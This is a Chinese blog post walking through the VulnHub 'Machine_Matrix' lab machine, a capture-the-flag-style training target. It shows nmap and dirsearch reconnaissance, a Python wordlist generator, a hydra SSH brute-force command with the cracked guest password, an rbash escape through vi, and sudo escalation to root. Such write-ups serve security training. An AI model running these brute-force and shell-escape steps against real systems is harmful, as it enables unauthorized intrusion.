Machine_Matrix

最新推荐文章于 2024-10-10 10:15:00 发布
最新推荐文章于 2024-10-10 10:15:00 发布
阅读量310 收藏 3
点赞数 2
分类专栏: vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140966209
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

开放 22、80、31337端口

nmap 192.168.236.163 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.163

二、漏洞探测

步骤一:访问80端口,未发现有用信息

步骤二:访问31337端口,在源码中发现一串密文

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

步骤三:base64 解码,像是输出内容到一个文件中

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

步骤四:下载打开,解密,说可以用 guest 用户登录,密码是 k1ll0rXX,但是少了最后两位

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

三、GetShell

步骤一:编写 python 脚本,生成密码本

import string
all_chars = string.ascii_letters + string.digits
with open("./password.txt","w") as f:
    for i in all_chars:
        for j in all_chars:
            f.writelines("k1ll0r" + i + j+"\n")

步骤二:hydra 爆破 ssh

hydra -l guest -P password.txt ssh://192.168.236.163 -vV -f -I -t 64

密码:k1ll0r7n

步骤三:ssh 登录

四、提权

步骤一:sudo -l ,查看root权限,受到rbash命令限制,按tab键查看可使用的命令

步骤二:发现vi命令可以使用,vi绕过rbash,配置环境变量

vi
按shift+:
!/bin/bash

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

步骤三:sudo -l 显示为all,sudo su提权,成功提权

步骤四:查看 flag

花椒椒椒
关注
专栏目录
Machine_Matrix靶机渗透测试
weixin_58786230的博客
08-07 302
使用命令#参数8 8:密码最小长度和最大长度-t:使用特殊符号%:0-9数字@:小写字母-o:输入到指定文件。
vulnhub靶场,Machine_Matrix1
kukudeshuo的博客
08-18 386
vulnhub靶场,Machine_Matrix1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/matrix-1,259/ 攻击机:kali(192.168.109.128) 靶机:Machine_Matrix1(192.168.109.164) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.164 使用n
Machine_Matrix 靶机
weixin_51559599的博客
11-01 109
80 端口未发现有用信息访问 nmap 扫描出的 http 31337 端口在源码中发现了一串密文像是输出了一句话到 Cypher.matrix 文件中禅师访问 Cypher.matrix 文件说可以用 guest 用户登录,密码是k1ll0rXX,但是少了最后两位。
Machine_Matrix1 渗透提权
猎荒者
12-15 467
前言 随笔一篇,用于记录,留下心得。 1.1 环境 ① 攻击机:Kali ② 靶机:Machine_Matrix 1.2 渗透实战 1.2.1 信息收集 ifconfig 查看攻击机 Kali IP,以确定待会要扫描的网段 ① 发现主机 命令:netdiscover -r 192.168.11.0/24 说明:192.168.11.136 是我另一台虚拟机的IP 由此可以得出 Machine_M...
Machine_Matrix靶机
m0_65285254的博客
08-11 298
意思是可以使用guest用户登录matrix,但是密码k1ll0rXX忘记了最后两位。根据端口扫描结果还有一个http服务端口,网址访问31337端口。访问Cypher.matrix网页,发现存在一个文件。使用kali自带crunch字典生成工具生成密码字典。echo一段话到了Cypher.matrix文件。f12查看源码,发现base64编码。设置桥接网卡,kali配置桥接网卡。很多命令无法执行,需要增加环境变量。开放22 80 31337端口。拼接目录/assets。提权 sudo su。
vulnhub系列:Machine_Matrix
jq_j37的博客
08-05 360
vulnhub系列:Machine_Matrix靶机,打靶文章
Machine_Matrix_v3 打靶渗透
m0_65112983的博客
08-06 1122
Machine_Matrix_v3 打靶渗透
vulnhub-Machine_Matrix靶机的测试报告
ccc_9wy的博客
10-10 1272
基于渗透测试流程渗透Machine_Matrix靶机;寻找信息,获取信息;base64解码;brainfuck解码;crunch生成模糊字典;ssh登录;rbash逃逸;
【vulnhub】Machine_Matrix_v3 打靶渗透
weixin_62162207的博客
08-13 405
Machine_Matrix_v3:打靶训练
tensor-machines-master_support_machine_matrix_
10-03
支持矩阵机(Support Matrix Machine, SMM)是一种用于矩阵型数据分类的机器学习算法,它扩展了传统的支持向量机(Support Vector Machine, SVM)的概念。SVM在处理向量数据时表现出色,而SMM则针对矩阵或图数据进行...
SVM.rar_LDA KNN_feature reduction_kernel svm_kernel_matrix_lda s
09-23
In this paper, we show how support vector machine (SVM) can be employed as a powerful tool for $k$-nearest neighbor (kNN) classifier. A novel multi-class dimensionality reduction approach, ...
led.zip_led 上位机_led 点阵_matrix led_点阵提取_软件
09-23
首先,我们要理解“上位机”(Host Machine)的概念。在LED显示系统中,上位机通常指的是控制和管理LED显示屏的计算机或者微控制器,它负责处理数据、图像处理、动画制作等任务,并通过通信接口将这些数据发送到下位...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2025年软考高级 - 信息系统项目管理师考试备考全攻略
11-09
2025年软考高级 - 信息系统项目管理师考试备考全攻略
MySQL 5.7从入门到精通 第23章 新闻发布系统数据库设计 共6页.pptx
最新发布
11-09
【课程大纲】 第1章 初始MySQL 共19页.pptx 第2章 MySQL的安装与配置 共14页.pptx 第3章 数据库的基本操作 共11页.pptx 第4章 数据表的基本操作 共26页.pptx 第5章 数据类型和运算符 共17页.pptx 第6章 MySQL函数 共76页.pptx 第7章 查询数据 共48页.pptx 第8章 插入、更新与删除数据 共10页.pptx 第9章 索引 共11页.pptx 第10章 存储过程和函数 共19页.pptx 第11章 视图 共20页.pptx 第12章 触发器 共11页.pptx 第13章 用户管理 共25页.pptx 第14章 数据备份与还原 共21页.pptx 第15章 MySQL日志 共22页.pptx 第16章 性能优化 共18页.pptx 第17章 MySQL Workbench5.2 的使用 共15页.pptx 第18章 MySQL Replication 共27页.pptx 第19章 MySQL Cluster 共49页.pptx 第20章 MySQL管理利器——MySQL Utilities 共5页.pptx 第21章 读写分离的利器——MySQL Proxy 共5页.pptx 第22章 PHP操作MySQL数据库 共7页.pptx 第23章 新闻发布系统数据库设计 共6页.pptx 第24章 论坛管理系统数据库设计 共6页.pptx
高分springboot毕设+vue的游戏创意工坊与推广平台的设计与实现_orv论文-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue的游戏创意工坊与推广平台的设计与实现。该项目旨在为游戏开发者和玩家提供一个集中的平台,使他们能够分享创意、展示作品并获取反馈。平台的核心功能包括游戏创意的提交与管理、游戏作品的展示与评价、用户间的互动交流以及推广活动的组织与管理。 在技术实现上,后端采用Spring Boot框架,利用其快速开发和部署的特点,确保系统的稳定性和高效性。前端则使用Vue.js,以其灵活的数据绑定和组件化开发方式,为用户提供流畅的交互体验。数据库设计充分考虑了数据的安全性和扩展性,以支持大量用户和作品的存储需求。 此外,项目还集成了多种实用工具和插件,如用户认证、权限管理、文件存储等,以提升平台的整体功能和用户体验。通过这个项目,用户不仅能够锻炼自己的编程技能,还能深入了解游戏开发和运营的全过程。
考研助手--论文.zip
11-09
基于SSM的毕业设计源码
kernel_matrix
04-05
It is used in various machine learning algorithms, such as support vector machines (SVMs) and kernel principal component analysis (kernel PCA). The kernel matrix is typically computed using a kernel...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值